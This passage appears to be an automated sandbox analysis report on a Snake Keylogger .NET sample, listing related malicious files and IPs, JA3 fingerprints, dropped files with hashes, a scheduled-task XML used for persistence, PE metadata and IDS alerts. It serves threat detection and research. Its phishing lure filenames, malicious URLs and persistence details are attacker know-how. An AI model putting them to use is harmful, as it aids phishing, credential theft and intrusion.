	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	file.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=	Get hash	malicious	Unknown	Browse	172.67.213.90
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	FW_ TBI Construction Company.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	MessengerAdmin.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	https://google.co.ve/url?6q=tlqq0rdJLi6z73yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fwdsoft.com.br%2f7yoya/ngr2j14j20ovor/ZGF2aWQucm90aGJ1cm5AcXVpbHRlcmNoZXZpb3QuY29t	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	172.67.177.134
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	172.67.177.134
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rXcourOVPD.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.381427237108526
Encrypted:	false
SSDEEP:	48:JWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:JLHyIFKL3IZ2KRH9Oug8s
MD5:	CCFE082F6EF2215B19C8797E151CF24B
SHA1:	010684546DE1F7039CE0BF368086E29EE3651553
SHA-256:	862C4A8AB3ABCA5BE214C1DDB06B041FC7896BC8DE6520570751D1C76F354BEF
SHA-512:	97C236D9F35ADDEA5260CBB5C1E78DE9877879EF1CB0C2BA1CCFE9A11F70D13FE40F26A5F4017F5A2F12E349257F2B4C7648562DE7025BAEDA6980D50E6B742F
Malicious:	false
Preview:	@...e.................................:..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25yirs4f.sbi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3c2hmgtj.gwk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjvx4lpt.nya.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dilwc3vx.tkp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4lqgljo.g10.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh24tyzs.0bz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idzmky1i.3jk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3al0aqy.ppu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.079827486718776
Encrypted:	false
SSDEEP:	24:2di4+S2qhLX1a4y1mEBUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiQTxvn:cgeTgYrFdOFzOzN33ODOiDdKrsuT7v
MD5:	F8425B1E48A9413A44ECD04029044CFE
SHA1:	3330888FCF79E6C99C6E8ABA493898BAB6A1A690
SHA-256:	3818DA595FDB514E2BF8C450BDF6C4A5C5E142A53D6E16D3EF4FD99363DCE6E9
SHA-512:	9CA0C71B47E922D77B476CE8BB79ED6F938841596E43E7A03DC577D0521C653DEAB471A43290B06B2CED75C38CF7EC5FF6FC698B2A3C0159D803B999F401F52B
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpAA33.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.079827486718776
Encrypted:	false
SSDEEP:	24:2di4+S2qhLX1a4y1mEBUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiQTxvn:cgeTgYrFdOFzOzN33ODOiDdKrsuT7v
MD5:	F8425B1E48A9413A44ECD04029044CFE
SHA1:	3330888FCF79E6C99C6E8ABA493898BAB6A1A690
SHA-256:	3818DA595FDB514E2BF8C450BDF6C4A5C5E142A53D6E16D3EF4FD99363DCE6E9
SHA-512:	9CA0C71B47E922D77B476CE8BB79ED6F938841596E43E7A03DC577D0521C653DEAB471A43290B06B2CED75C38CF7EC5FF6FC698B2A3C0159D803B999F401F52B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	640512
Entropy (8bit):	7.59038422508059
Encrypted:	false
SSDEEP:	12288:2dMdY9shQglOUQwZvb6JecS0W/0Wjz3lXsBHxxe70ZjwqmKH2JS:BdhlrQwIJe/bYxiqmm28
MD5:	30E5E5A39DF67A1138BF84DB89A5EB47
SHA1:	D269595A30FD1E49086C51F629E39C15200E0149
SHA-256:	1D409E94B935C68A4B4841A1B2E05C6ABF1EA827C419EAB8BF3EE23229574160
SHA-512:	365324EC484C65E7FB010F1A1FA5B5F97AFEF3E99D7E16E5AE753FE26DA6A62C782196283EC71269A7198E6690DE40FCC877F5F7B558A588F4994EDFB95FE673
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: Request for quote.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iVg..............0......(.......... ........@.. ....................... ............@.................................x...O........$........................................................................... ............... ..H............text...0.... ...................... ..`.rsrc....$.......&..................@..@.reloc..............................@..B........................H.......$L...{..........(...P............................................0...........(.....(.....{...........%.r...p( ...s!....%.r...p( ...s!....%.r%..p( ...s!........T...%.b...("...s!...(#...rA..p ............%...%...o$...&....0..^........{....o%....{.....A.Zo&....[...o'...&.{....o%...o(....>"....{....o%...o)....{....o%...r_..po'...&.{....o...ru..pr_..p.(+....@.....{....o.....{....r...p.{....\|....(,...(-...o.....{....r...p.{....\|....(,...(-...o.....{....r...p.{....\|....(,.

C:\Users\user\AppData\Roaming\rXcourOVPD.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.59038422508059
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	640'512 bytes
MD5:	30e5e5a39df67a1138bf84db89a5eb47
SHA1:	d269595a30fd1e49086c51f629e39c15200e0149
SHA256:	1d409e94b935c68a4b4841a1b2e05c6abf1ea827c419eab8bf3ee23229574160
SHA512:	365324ec484c65e7fb010f1a1fa5b5f97afef3e99d7e16e5ae753fe26da6a62c782196283ec71269a7198e6690de40fcc877f5f7b558a588f4994edfb95fe673
SSDEEP:	12288:2dMdY9shQglOUQwZvb6JecS0W/0Wjz3lXsBHxxe70ZjwqmKH2JS:BdhlrQwIJe/bYxiqmm28
TLSH:	8FD4F154AB5DC517C98017359EA2F6BC16699E9CF911D243AFECBFAF3CB2A141C04382
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iVg..............0......(........... ........@.. ....................... ............@................................

File Icon


Icon Hash:	17692632b3936907

Static PE Info

General

Entrypoint:	0x49b9ca
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675669B1 [Mon Dec 9 03:53:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F3BECED0392h
je 00007F3BECED0392h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F3BECED0392h
imul eax, dword ptr [eax], 00610076h
je 00007F3BECED0392h
outsd
add byte ptr [edx+00h], dh
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F3BECED0392h
je 00007F3BECED0392h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007F3BECED0392h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007F3BECED0392h
jnc 00007F3BECED0392h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b978	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0x2494	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x99a30	0x99c00	0221da5cbf79299c22fda04ddb9d585c	False	0.8813357469512195	data	7.595806466843068	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x9c000	0x2494	0x2600	7a51be90de60239e24611f32c14c1179	False	0.8692434210526315	data	7.404002770905549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0xc	0x200	c18cdddbda7196afd69aafbbd787bc7c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x9c100	0x1e7e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9827056110684089
RT_GROUP_ICON	0x9df90	0x14	data	1.05
RT_VERSION	0x9dfb4	0x2e0	data	0.452445652173913
RT_MANIFEST	0x9e2a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T17:58:01.232447+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49711	132.226.8.169	80	TCP
2024-12-13T17:58:03.638572+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49711	132.226.8.169	80	TCP
